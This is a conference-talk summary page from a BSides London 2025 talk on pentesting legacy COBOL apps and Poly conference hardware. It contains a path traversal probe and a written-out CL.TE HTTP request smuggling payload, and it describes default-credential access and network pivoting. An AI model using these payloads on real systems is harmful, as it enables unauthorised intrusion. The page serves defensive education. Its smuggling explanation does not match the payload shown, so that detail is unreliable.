Kuboid
Open Luck·Kuboid.in
Security BSides2025
Open in YouTube ↗

Does The Fog Ever Stop? Testing Without All The Answers

Security BSides London70 views15:17about 1 month ago

This talk explores the methodology of conducting penetration tests on unfamiliar technologies, specifically legacy COBOL applications and specialized conference room hardware. The speaker demonstrates how to identify and exploit local file inclusion (LFI) in a legacy system and how to perform network reconnaissance and default credential exploitation on Poly conference equipment. The presentation emphasizes the importance of fundamental security knowledge, thorough documentation, and adaptability when facing unknown environments.

Beyond the Checklist: Exploiting Legacy COBOL and Poly Conference Hardware

TLDR: This post breaks down how to approach unfamiliar targets like legacy COBOL applications and specialized conference room hardware by focusing on fundamental protocol behavior rather than automated scanning. By identifying local file inclusion in a legacy system and exploiting default credentials on Poly conference devices, we demonstrate that manual testing often uncovers what automated tools miss. Pentesters should prioritize understanding how requests are processed across different layers of the stack to identify vulnerabilities like HTTP request smuggling and insecure redirects.

Testing against legacy systems often feels like walking into a room where the lights have been off for decades. Most modern scanners will choke on COBOL-based backends or specialized hardware interfaces, leaving you with a false sense of security or, worse, an empty report. The reality is that these systems are often the most fragile parts of an enterprise network. When you encounter a target that doesn't fit the standard web application profile, stop relying on your automated toolchain and start looking at how the application handles the fundamental building blocks of network communication.

Breaking Legacy COBOL Applications

Legacy applications, particularly those written in COBOL, are still surprisingly common in banking and insurance sectors. These systems often act as the core processing engine, hidden behind a modern web-based front end. During a recent engagement, I encountered a system that allowed users to select a CSV file for processing. The interface was minimal, and the backend was a black box.

Instead of throwing a massive wordlist at the input field, I looked at the error messages. When I supplied an arbitrary filename, the application returned the full path it was attempting to access. This is a classic indicator of Local File Inclusion (LFI), but in a legacy context, it often points to a lack of input sanitization in the underlying file handling routines.

By testing with simple path traversal sequences, I confirmed the vulnerability.

# Testing for LFI on the legacy endpoint
../test

The application failed to properly validate the input, allowing me to traverse the directory structure. While the system didn't have the modern methods to break out of the file extension constraints, the ability to read arbitrary files from the server is a significant finding. In a real-world engagement, this is the kind of bug that leads to credential harvesting or the exposure of sensitive configuration files that are often stored in plain text on older systems.

Hardware Reconnaissance and Default Credentials

Conference room hardware, such as the Poly TC10 and Studio G9, presents a different set of challenges. These devices are essentially mini-computers designed to join meetings, but they are often deployed with minimal hardening. During a recent test, I found that these devices were configured with default credentials that were derived from the device's serial number.

This is a common Identification and Authentication Failure, and it highlights why hardware testing requires a mix of physical inspection and network analysis. Once I gained access to the admin panel, I was able to inspect the network settings. I discovered that the device was using a manual IP configuration, which allowed me to map the internal network and identify other connected devices.

By manually setting the IP address and scanning the device, I found that port 514 was open. While this wasn't a shell, it provided a logging port that, combined with the device's insecure TLS configuration, allowed for further reconnaissance. The key takeaway here is that hardware is just another endpoint. If you can get into the admin panel, you can usually find a way to pivot into the rest of the network.

The Risks of HTTP/1.1 Downgrading

One of the most interesting findings from recent research involves the way modern web applications handle HTTP Request Smuggling. Many front-end servers still support HTTP/1.1 for compatibility with legacy components. When a front-end server receives an HTTP/2 request but forwards it to a back-end server as HTTP/1.1, it must reformat the request.

If the front-end and back-end servers disagree on how to define the end of a request, you can smuggle a second request inside the first. This can lead to cache poisoning or the hijacking of other users' requests. During a test, I used this technique to identify an open redirect vulnerability.

POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The vulnerability exists because the application doesn't sanitize user input before it is processed by the back-end. By injecting a full URL into the scheme header, I was able to force an open redirect. While the presence of a domain-fronting blocker prevented full exploitation in this specific instance, the risk is clear. On a production application without these protections, this could be used to bypass security controls and redirect users to malicious sites.

Moving Beyond the Toolchain

The most effective way to improve your testing methodology is to document everything. When you encounter a new technology, don't just run a scan and move on. Take the time to understand how the application handles requests and where the boundaries are. This not only helps you find more bugs, but it also builds the consultancy skills you need to explain your findings to clients.

If you find yourself stuck, look at the documentation for the protocols involved. Understanding the RFCs for HTTP/1.1 and HTTP/2 is often more valuable than any automated tool. The next time you are on an engagement, try to spend an hour just mapping the application's behavior without using a scanner. You might be surprised by what you find.

Talk Type
talk
Difficulty
intermediate
Category
red team
Has Demo Has Code Tool Released


BSides London 2025 Rookie Track 1

14 talks · 2025
Browse conference →
Premium Security Audit

We break your app before they do.

Professional penetration testing and vulnerability assessments by the Kuboid Secure Layer team. Securing your infrastructure at every layer.

Get in Touch
Official Security Partner
kuboid.in